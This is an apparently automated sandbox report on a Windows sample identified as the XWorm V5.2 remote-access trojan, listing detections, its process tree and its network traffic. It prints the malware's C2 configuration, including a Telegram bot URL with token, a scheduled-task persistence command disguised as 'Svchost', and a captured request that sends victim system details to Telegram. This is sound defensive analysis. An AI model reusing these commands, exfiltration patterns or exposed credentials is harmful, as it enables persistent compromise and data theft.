Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
X.exe

Overview

General Information

Sample name:X.exe
Analysis ID:1387988
MD5:f57ec853b0f01b0e9954cfbf8feeb081
SHA1:f0197d2da76f563373686dd104305d1eeb21ec7c
SHA256:3d07268c23490174416ef5a8061e318b5b8b820cb89b27803996085c3b3ee927
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • X.exe (PID: 7096 cmdline: C:\Users\user\Desktop\X.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
    • schtasks.exe (PID: 5920 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5004 cmdline: C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Svchost.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6884 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Local\Temp\Svchost.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 3088 cmdline: "C:\Users\user\AppData\Local\Temp\Svchost.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 1176 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 5896 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6460 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2888 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3656 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
SourceRuleDescriptionAuthorStrings
X.exeJoeSecurity_XWormYara detected XWormJoe Security
    X.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      X.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x78b2:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\Svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\Svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\Temp\Svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x78b2:$cnc4: POST / HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7876:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7913:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7a28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x76b2:$cnc4: POST / HTTP/1.1
            Process Memory Space: X.exe PID: 7096JoeSecurity_XWormYara detected XWormJoe Security
              SourceRuleDescriptionAuthorStrings
              0.0.X.exe.1f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.0.X.exe.1f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.0.X.exe.1f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x78b2:$cnc4: POST / HTTP/1.1

                  System Summary

                  barindex
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\X.exe, ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 7096, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5920, ProcessName: schtasks.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\X.exe, ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 7096, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5920, ProcessName: schtasks.exe
                  Timestamp:192.168.2.6167.71.56.11649753221002855924 02/07/24-03:23:12.549811
                  SID:2855924
                  Source Port:49753
                  Destination Port:22100
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: X.exeAvira: detected
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                  Source: 00000004.00000002.2156316265.00000000028EC000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
                  Source: eu-central-7075.packetriot.netVirustotal: Detection: 13%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeReversingLabs: Detection: 81%
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeVirustotal: Detection: 79%Perma Link
                  Source: X.exeReversingLabs: Detection: 81%
                  Source: X.exeVirustotal: Detection: 79%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeJoe Sandbox ML: detected
                  Source: X.exeJoe Sandbox ML: detected
                  Source: X.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2
                  Source: X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbc9 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: .pdb6 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: csymbols\dll\mscorlib.pdbpdb` source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdb( source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Core.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdbSystem.Management.dllSystem.Xml.ni.dll source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.pdb@ source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp, WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B10D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbp source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb,_ source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: p\X.PDB0 source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\X.PDBL7 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49753 -> 167.71.56.116:22100
                  Source: Malware configuration extractorURLs: trusting-smoke-90361.pktriot.net
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: X.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.6:49700 -> 167.71.56.116:22100
                  Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 167.71.56.116 167.71.56.116
                  Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: api.telegram.org
                  Source: svchost.exe, 00000012.00000003.4039552321.00000152D0976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4039552321.00000152D0976000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521959377.00000152D0E71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046279655.00000152D0E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpose
                  Source: svchost.exe, 00000012.00000002.4521274770.00000152D00DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046617502.00000152D095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd=
                  Source: svchost.exe, 00000012.00000003.4032113255.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdchem
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
                  Source: svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurityTokenR
                  Source: svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1
                  Source: svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxHwM5g
                  Source: svchost.exe, 00000012.00000003.4031443608.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046412666.00000152D0955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046617502.00000152D095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd%
                  Source: svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2BQpw43/HK
                  Source: svchost.exe, 00000012.00000003.4032113255.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
